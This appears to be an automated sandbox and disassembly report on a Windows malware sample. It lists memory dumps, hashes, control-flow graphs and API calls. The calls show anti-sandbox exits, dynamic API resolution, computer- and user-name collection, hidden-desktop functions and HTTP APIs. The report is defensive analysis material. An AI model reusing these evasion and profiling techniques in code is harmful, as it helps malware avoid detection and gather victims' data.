                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: 74d4ce33ab96e453db0b664d16d3ba667544e3f317c8af430758d434b06662c6
                            • Instruction ID: 1547e9b4343f1ffd61c94c588a70ce7bbde89302644af1086f9283d6fd6e6d31
                            • Opcode Fuzzy Hash: 74d4ce33ab96e453db0b664d16d3ba667544e3f317c8af430758d434b06662c6
                            • Instruction Fuzzy Hash: 31A192B9A11700DFD758DF65EEA8A26B7B9FB883413048519F906C3364DBB4A900EF70

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2141 b21bf0-b21c0b call b02a90 call b26390 2146 b21c1a-b21c27 call b02930 2141->2146 2147 b21c0d 2141->2147 2151 b21c35-b21c63 2146->2151 2152 b21c29-b21c2f lstrcpy 2146->2152 2148 b21c10-b21c18 2147->2148 2148->2146 2148->2148 2156 b21c65-b21c67 ExitProcess 2151->2156 2157 b21c6d-b21c7b GetSystemInfo 2151->2157 2152->2151 2158 b21c85-b21ca0 call b01030 call b010c0 GetUserDefaultLangID 2157->2158 2159 b21c7d-b21c7f ExitProcess 2157->2159 2164 b21ca2-b21ca9 2158->2164 2165 b21cb8-b21cca call b22ad0 call b23e10 2158->2165 2164->2165 2166 b21cb0-b21cb2 ExitProcess 2164->2166 2171 b21ce7-b21d06 lstrlen call b02930 2165->2171 2172 b21ccc-b21cde call b22a40 call b23e10 2165->2172 2178 b21d23-b21d40 lstrlen call b02930 2171->2178 2179 b21d08-b21d0d 2171->2179 2172->2171 2183 b21ce0-b21ce1 ExitProcess 2172->2183 2186 b21d42-b21d44 2178->2186 2187 b21d5a-b21d7b call b22ad0 lstrlen call b02930 2178->2187 2179->2178 2181 b21d0f-b21d11 2179->2181 2181->2178 2184 b21d13-b21d1d lstrcpy lstrcat 2181->2184 2184->2178 2186->2187 2188 b21d46-b21d54 lstrcpy lstrcat 2186->2188 2193 b21d9a-b21db4 lstrlen call b02930 2187->2193 2194 b21d7d-b21d7f 2187->2194 2188->2187 2199 b21db6-b21db8 2193->2199 2200 b21dce-b21deb call b22a40 lstrlen call b02930 2193->2200 2194->2193 2195 b21d81-b21d85 2194->2195 2195->2193 2197 b21d87-b21d94 lstrcpy lstrcat 2195->2197 2197->2193 2199->2200 2201 b21dba-b21dc8 lstrcpy lstrcat 2199->2201 2206 b21e0a-b21e0f 2200->2206 2207 b21ded-b21def 2200->2207 2201->2200 2209 b21e11 call b02a20 2206->2209 2210 b21e16-b21e22 call b02930 2206->2210 2207->2206 2208 b21df1-b21df5 2207->2208 2208->2206 2211 b21df7-b21e04 lstrcpy lstrcat 2208->2211 2209->2210 2215 b21e30-b21e66 call b02a20 * 5 OpenEventA 2210->2215 2216 b21e24-b21e26 2210->2216 2211->2206 2228 b21e68-b21e8a CloseHandle Sleep OpenEventA 2215->2228 2229 b21e8c-b21ea0 CreateEventA call b21b20 call b1ffd0 2215->2229 2216->2215 2217 b21e28-b21e2a lstrcpy 2216->2217 2217->2215 2228->2228 2228->2229 2233 b21ea5-b21eae CloseHandle ExitProcess 2229->2233
                            APIs
                              • Part of subcall function 00B26390: GetProcAddress.KERNEL32(77190000,018717C8), ref: 00B263E9
                              • Part of subcall function 00B26390: GetProcAddress.KERNEL32(77190000,018716D8), ref: 00B26402
                              • Part of subcall function 00B26390: GetProcAddress.KERNEL32(77190000,01871648), ref: 00B2641A
                              • Part of subcall function 00B26390: GetProcAddress.KERNEL32(77190000,018716F0), ref: 00B26432
                              • Part of subcall function 00B26390: GetProcAddress.KERNEL32(77190000,01878978), ref: 00B2644B
                              • Part of subcall function 00B26390: GetProcAddress.KERNEL32(77190000,01865448), ref: 00B26463
                              • Part of subcall function 00B26390: GetProcAddress.KERNEL32(77190000,018654C8), ref: 00B2647B
                              • Part of subcall function 00B26390: GetProcAddress.KERNEL32(77190000,01871738), ref: 00B26494
                              • Part of subcall function 00B26390: GetProcAddress.KERNEL32(77190000,01871780), ref: 00B264AC
                              • Part of subcall function 00B26390: GetProcAddress.KERNEL32(77190000,01871678), ref: 00B264C4
                              • Part of subcall function 00B26390: GetProcAddress.KERNEL32(77190000,01871768), ref: 00B264DD
                              • Part of subcall function 00B26390: GetProcAddress.KERNEL32(77190000,01865468), ref: 00B264F5
                              • Part of subcall function 00B26390: GetProcAddress.KERNEL32(77190000,01871690), ref: 00B2650D
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B21C2F
                            • ExitProcess.KERNEL32 ref: 00B21C67
                            • GetSystemInfo.KERNEL32(?), ref: 00B21C71
                            • ExitProcess.KERNEL32 ref: 00B21C7F
                              • Part of subcall function 00B01030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00B01046
                              • Part of subcall function 00B01030: VirtualAllocExNuma.KERNEL32(00000000), ref: 00B0104D
                              • Part of subcall function 00B01030: ExitProcess.KERNEL32 ref: 00B01058
                              • Part of subcall function 00B010C0: GlobalMemoryStatusEx.KERNEL32 ref: 00B010EA
                              • Part of subcall function 00B010C0: ExitProcess.KERNEL32 ref: 00B01114
                            • GetUserDefaultLangID.KERNEL32 ref: 00B21C8F
                            • ExitProcess.KERNEL32 ref: 00B21CB2
                            • ExitProcess.KERNEL32 ref: 00B21CE1
                            • lstrlen.KERNEL32(018789C8), ref: 00B21CEE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B21D15
                            • lstrcat.KERNEL32(00000000,018789C8), ref: 00B21D1D
                            • lstrlen.KERNEL32(00B34B98), ref: 00B21D28
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B21D48
                            • lstrcat.KERNEL32(00000000,00B34B98), ref: 00B21D54
                            • lstrlen.KERNEL32(00000000), ref: 00B21D63
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B21D89
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B21D94
                            • lstrlen.KERNEL32(00B34B98), ref: 00B21D9F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B21DBC
                            • lstrcat.KERNEL32(00000000,00B34B98), ref: 00B21DC8
                            • lstrlen.KERNEL32(00000000), ref: 00B21DD7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B21DF9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B21E04
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                            • String ID:
                            • API String ID: 3366406952-0
                            • Opcode ID: 4060ffb07505557b8fd0fa4dc9ffedb435899430e238cf8ddc9c017892640e6b
                            • Instruction ID: f57817f2f390d407d072906bfca3ba2f4d368957dc25271f4449e7463f74b079
                            • Opcode Fuzzy Hash: 4060ffb07505557b8fd0fa4dc9ffedb435899430e238cf8ddc9c017892640e6b
                            • Instruction Fuzzy Hash: A371B231500325ABCB21ABB8EC8DB6E7BF9EF55741F0404A4F90AE62A1DF749805DB70

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2850 b04a60-b04afc RtlAllocateHeap 2867 b04b7a-b04bbe VirtualProtect 2850->2867 2868 b04afe-b04b03 2850->2868 2869 b04b06-b04b78 2868->2869 2869->2867
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B04AA3
                            • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00B04BB0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                            • API String ID: 1542196881-3329630956
                            • Opcode ID: abd6a93b0adf19d868ead38088630e948a540a44d874efc077c244263d1460c8
                            • Instruction ID: 6eb5af4abc4219ffbd5a2b2583f7925494de5d9355791baaa19a9f40cdc28156
                            • Opcode Fuzzy Hash: abd6a93b0adf19d868ead38088630e948a540a44d874efc077c244263d1460c8
                            • Instruction Fuzzy Hash: 7D31D818B8021D7E8620EBEF4D47F5F7ED5DF85760F2142D6750857190CBA16581CBE2

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2957 b22ad0-b22b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2958 b22b44-b22b59 2957->2958 2959 b22b24-b22b36 2957->2959
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00B22AFF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B22B06
                            • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00B22B1A
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: ff0dfe713507351f63133bf7dc4df83a0138e250fc82c80d92165e04017fdc7c
                            • Instruction ID: 726a08c73753736da218739a386d079dc876a947e34688707d90ce46fb9e8bb4
                            • Opcode Fuzzy Hash: ff0dfe713507351f63133bf7dc4df83a0138e250fc82c80d92165e04017fdc7c
                            • Instruction Fuzzy Hash: 6F01AD72A44218ABCB10CF99ED45BAAF7B8FB44B21F00026AF919E3780D7B4190086A1
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00B22A6F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B22A76
                            • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00B22A8A
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: f63a403e0056012f66b522be91c0429eb1d6eba30476b58a21d121975564f5f6
                            • Instruction ID: bdf4cd58cf4b63332b8f72e2285015a50e5944a15cbab8ea89cf90e36a98cfad
                            • Opcode Fuzzy Hash: f63a403e0056012f66b522be91c0429eb1d6eba30476b58a21d121975564f5f6
                            • Instruction Fuzzy Hash: CBF0B4B2A44314ABC700DF88DD49B9EFBBCFB04B21F000216F915E3380D7B4190486A1

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 633 b266e0-b266e7 634 b26afe-b26b92 LoadLibraryA * 8 633->634 635 b266ed-b26af9 GetProcAddress * 43 633->635 636 b26b94-b26c03 GetProcAddress * 5 634->636 637 b26c08-b26c0f 634->637 635->634 636->637 638 b26cd2-b26cd9 637->638 639 b26c15-b26ccd GetProcAddress * 8 637->639 640 b26cdb-b26d4a GetProcAddress * 5 638->640 641 b26d4f-b26d56 638->641 639->638 640->641 642 b26de9-b26df0 641->642 643 b26d5c-b26de4 GetProcAddress * 6 641->643 644 b26f10-b26f17 642->644 645 b26df6-b26f0b GetProcAddress * 12 642->645 643->642 646 b26f19-b26f88 GetProcAddress * 5 644->646 647 b26f8d-b26f94 644->647 645->644 646->647 648 b26fc1-b26fc8 647->648 649 b26f96-b26fbc GetProcAddress * 2 647->649 650 b26ff5-b26ffc 648->650 651 b26fca-b26ff0 GetProcAddress * 2 648->651 649->648 652 b27002-b270e8 GetProcAddress * 10 650->652 653 b270ed-b270f4 650->653 651->650 652->653 654 b27152-b27159 653->654 655 b270f6-b2714d GetProcAddress * 4 653->655 656 b2715b-b27169 GetProcAddress 654->656 657 b2716e-b27175 654->657 655->654 656->657 658 b271d3 657->658 659 b27177-b271ce GetProcAddress * 4 657->659 659->658
                            APIs
                            • GetProcAddress.KERNEL32(77190000,01865708), ref: 00B266F5
                            • GetProcAddress.KERNEL32(77190000,01865528), ref: 00B2670D
                            • GetProcAddress.KERNEL32(77190000,01878FC0), ref: 00B26726
                            • GetProcAddress.KERNEL32(77190000,01879038), ref: 00B2673E
                            • GetProcAddress.KERNEL32(77190000,01879008), ref: 00B26756
                            • GetProcAddress.KERNEL32(77190000,0187D580), ref: 00B2676F
                            • GetProcAddress.KERNEL32(77190000,0186A5F0), ref: 00B26787
                            • GetProcAddress.KERNEL32(77190000,0187D5C8), ref: 00B2679F
                            • GetProcAddress.KERNEL32(77190000,0187D628), ref: 00B267B8
                            • GetProcAddress.KERNEL32(77190000,0187D6D0), ref: 00B267D0
                            • GetProcAddress.KERNEL32(77190000,0187D448), ref: 00B267E8
                            • GetProcAddress.KERNEL32(77190000,01865648), ref: 00B26801
                            • GetProcAddress.KERNEL32(77190000,01865728), ref: 00B26819
                            • GetProcAddress.KERNEL32(77190000,01865668), ref: 00B26831
                            • GetProcAddress.KERNEL32(77190000,01865548), ref: 00B2684A
                            • GetProcAddress.KERNEL32(77190000,0187D5E0), ref: 00B26862
                            • GetProcAddress.KERNEL32(77190000,0187D730), ref: 00B2687A
                            • GetProcAddress.KERNEL32(77190000,0186A870), ref: 00B26893
                            • GetProcAddress.KERNEL32(77190000,01865588), ref: 00B268AB
                            • GetProcAddress.KERNEL32(77190000,0187D610), ref: 00B268C3
                            • GetProcAddress.KERNEL32(77190000,0187D6E8), ref: 00B268DC
                            • GetProcAddress.KERNEL32(77190000,0187D4A8), ref: 00B268F4
                            • GetProcAddress.KERNEL32(77190000,0187D5F8), ref: 00B2690C
                            • GetProcAddress.KERNEL32(77190000,018653C8), ref: 00B26925
                            • GetProcAddress.KERNEL32(77190000,0187D598), ref: 00B2693D
                            • GetProcAddress.KERNEL32(77190000,0187D640), ref: 00B26955
                            • GetProcAddress.KERNEL32(77190000,0187D4C0), ref: 00B2696E
                            • GetProcAddress.KERNEL32(77190000,0187D550), ref: 00B26986
                            • GetProcAddress.KERNEL32(77190000,0187D700), ref: 00B2699E
                            • GetProcAddress.KERNEL32(77190000,0187D6A0), ref: 00B269B7
                            • GetProcAddress.KERNEL32(77190000,0187D670), ref: 00B269CF
                            • GetProcAddress.KERNEL32(77190000,0187D4D8), ref: 00B269E7
                            • GetProcAddress.KERNEL32(77190000,0187D658), ref: 00B26A00
                            • GetProcAddress.KERNEL32(77190000,0186F988), ref: 00B26A18
                            • GetProcAddress.KERNEL32(77190000,0187D4F0), ref: 00B26A30
                            • GetProcAddress.KERNEL32(77190000,0187D568), ref: 00B26A49
                            • GetProcAddress.KERNEL32(77190000,01865688), ref: 00B26A61
                            • GetProcAddress.KERNEL32(77190000,0187D718), ref: 00B26A79
                            • GetProcAddress.KERNEL32(77190000,018656A8), ref: 00B26A92
                            • GetProcAddress.KERNEL32(77190000,0187D688), ref: 00B26AAA
                            • GetProcAddress.KERNEL32(77190000,0187D508), ref: 00B26AC2
                            • GetProcAddress.KERNEL32(77190000,018653E8), ref: 00B26ADB
                            • GetProcAddress.KERNEL32(77190000,01865428), ref: 00B26AF3
                            • LoadLibraryA.KERNEL32(0187D520,00B2051F), ref: 00B26B05
                            • LoadLibraryA.KERNEL32(0187D460), ref: 00B26B16
                            • LoadLibraryA.KERNEL32(0187D478), ref: 00B26B28
                            • LoadLibraryA.KERNEL32(0187D6B8), ref: 00B26B3A
                            • LoadLibraryA.KERNEL32(0187D490), ref: 00B26B4B
                            • LoadLibraryA.KERNEL32(0187D538), ref: 00B26B5D
                            • LoadLibraryA.KERNEL32(0187D5B0), ref: 00B26B6F
                            • LoadLibraryA.KERNEL32(0187D8E0), ref: 00B26B80
                            • GetProcAddress.KERNEL32(77040000,01865128), ref: 00B26B9C
                            • GetProcAddress.KERNEL32(77040000,0187D880), ref: 00B26BB4
                            • GetProcAddress.KERNEL32(77040000,018789F8), ref: 00B26BCD
                            • GetProcAddress.KERNEL32(77040000,0187D7D8), ref: 00B26BE5
                            • GetProcAddress.KERNEL32(77040000,01865228), ref: 00B26BFD
                            • GetProcAddress.KERNEL32(70590000,0186A528), ref: 00B26C1D
                            • GetProcAddress.KERNEL32(70590000,018651C8), ref: 00B26C35
                            • GetProcAddress.KERNEL32(70590000,0186A618), ref: 00B26C4E
                            • GetProcAddress.KERNEL32(70590000,0187D748), ref: 00B26C66
                            • GetProcAddress.KERNEL32(70590000,0187D760), ref: 00B26C7E
                            • GetProcAddress.KERNEL32(70590000,01865248), ref: 00B26C97
                            • GetProcAddress.KERNEL32(70590000,018651A8), ref: 00B26CAF
                            • GetProcAddress.KERNEL32(70590000,0187D898), ref: 00B26CC7
                            • GetProcAddress.KERNEL32(768D0000,01865328), ref: 00B26CE3
                            • GetProcAddress.KERNEL32(768D0000,018651E8), ref: 00B26CFB
                            • GetProcAddress.KERNEL32(768D0000,0187D868), ref: 00B26D14
                            • GetProcAddress.KERNEL32(768D0000,0187D808), ref: 00B26D2C
                            • GetProcAddress.KERNEL32(768D0000,01864F88), ref: 00B26D44
                            • GetProcAddress.KERNEL32(75790000,0186A848), ref: 00B26D64
                            • GetProcAddress.KERNEL32(75790000,0186A5A0), ref: 00B26D7C
                            • GetProcAddress.KERNEL32(75790000,0187D8F8), ref: 00B26D95
                            • GetProcAddress.KERNEL32(75790000,01864FA8), ref: 00B26DAD
                            • GetProcAddress.KERNEL32(75790000,01864FC8), ref: 00B26DC5
                            • GetProcAddress.KERNEL32(75790000,0186A910), ref: 00B26DDE
                            • GetProcAddress.KERNEL32(75A10000,0187D778), ref: 00B26DFE
                            • GetProcAddress.KERNEL32(75A10000,01864FE8), ref: 00B26E16
                            • GetProcAddress.KERNEL32(75A10000,01878A28), ref: 00B26E2F
                            • GetProcAddress.KERNEL32(75A10000,0187D8B0), ref: 00B26E47
                            • GetProcAddress.KERNEL32(75A10000,0187D790), ref: 00B26E5F
                            • GetProcAddress.KERNEL32(75A10000,01865008), ref: 00B26E78
                            • GetProcAddress.KERNEL32(75A10000,01865028), ref: 00B26E90
                            • GetProcAddress.KERNEL32(75A10000,0187D8C8), ref: 00B26EA8
                            • GetProcAddress.KERNEL32(75A10000,0187D7A8), ref: 00B26EC1
                            • GetProcAddress.KERNEL32(75A10000,CreateDesktopA), ref: 00B26ED7
                            • GetProcAddress.KERNEL32(75A10000,OpenDesktopA), ref: 00B26EEE
                            • GetProcAddress.KERNEL32(75A10000,CloseDesktop), ref: 00B26F05
                            • GetProcAddress.KERNEL32(76850000,01865268), ref: 00B26F21
                            • GetProcAddress.KERNEL32(76850000,0187D7C0), ref: 00B26F39
                            • GetProcAddress.KERNEL32(76850000,0187D838), ref: 00B26F52
                            • GetProcAddress.KERNEL32(76850000,0187D7F0), ref: 00B26F6A
                            • GetProcAddress.KERNEL32(76850000,0187D820), ref: 00B26F82
                            • GetProcAddress.KERNEL32(75690000,01865048), ref: 00B26F9E
                            • GetProcAddress.KERNEL32(75690000,01865068), ref: 00B26FB6
                            • GetProcAddress.KERNEL32(769C0000,01865088), ref: 00B26FD2
                            • GetProcAddress.KERNEL32(769C0000,0187D850), ref: 00B26FEA
                            • GetProcAddress.KERNEL32(6F8C0000,018650A8), ref: 00B2700A
                            • GetProcAddress.KERNEL32(6F8C0000,01865288), ref: 00B27022
                            • GetProcAddress.KERNEL32(6F8C0000,018652A8), ref: 00B2703B
                            • GetProcAddress.KERNEL32(6F8C0000,0187D370), ref: 00B27053
                            • GetProcAddress.KERNEL32(6F8C0000,018652C8), ref: 00B2706B
                            • GetProcAddress.KERNEL32(6F8C0000,018652E8), ref: 00B27084
                            • GetProcAddress.KERNEL32(6F8C0000,01865368), ref: 00B2709C
                            • GetProcAddress.KERNEL32(6F8C0000,018650C8), ref: 00B270B4
                            • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 00B270CB
                            • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 00B270E2
                            • GetProcAddress.KERNEL32(75D90000,0187D1D8), ref: 00B270FE
                            • GetProcAddress.KERNEL32(75D90000,01878A78), ref: 00B27116
                            • GetProcAddress.KERNEL32(75D90000,0187D1A8), ref: 00B2712F
                            • GetProcAddress.KERNEL32(75D90000,0187D328), ref: 00B27147
                            • GetProcAddress.KERNEL32(76470000,01865308), ref: 00B27163
                            • GetProcAddress.KERNEL32(70180000,0187D310), ref: 00B2717F
